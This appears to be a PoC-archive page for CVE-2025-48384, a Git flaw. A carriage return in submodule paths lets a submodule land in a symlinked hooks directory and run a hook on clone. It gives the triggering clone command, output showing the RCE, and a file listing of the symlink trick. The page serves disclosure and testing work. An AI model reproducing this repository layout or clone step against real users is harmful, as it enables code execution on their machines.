关联漏洞
标题:
Git 安全漏洞
(CVE-2025-48384)
描述:Git是Git开源的一套免费、开源的分布式版本控制系统。 Git存在安全漏洞,该漏洞源于在处理配置值时尾随回车符的处理不当,可能使子模块被错误检出到由符号链接指向的钩子目录,意外执行其中的可执行脚本。
描述
PoC for CVE-2025-48384
介绍
# PoC for CVE-2025-48384
See [CVE-2025-48384](https://dgl.cx/2025/07/git-clone-submodule-cve-2025-48384)
To run:
```
git -c protocol.file.allow=always clone --recurse-submodules git@github.com:liamg/CVE-2025-48384.git
```
Example output:
```
git -c protocol.file.allow=always clone --recurse-submodules CVE-2025-48384 test
Cloning into 'test'...
done.
'ubmodule 'sub' (git@github.com:liamg/CVE-2025-48384-submodule.git) registered for path 'sub
'...ing into '/Users/liamg/test/sub
remote: Enumerating objects: 5, done.
remote: Counting objects: 100% (5/5), done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 5 (delta 0), reused 5 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (5/5), done.
Uh-oh, this is an RCE!
```
The executed payload is [here](https://github.com/liamg/CVE-2025-48384-submodule/blob/main/post-checkout).
文件快照
[4.0K] /data/pocs/8c038ba70871c4d33bee3d5dbd5d972d11b28b3b
├── [ 855] README.md
├── [ 22] sub -> .git/modules/sub/hooks
└── [4.0K] sub\015
1 directory, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。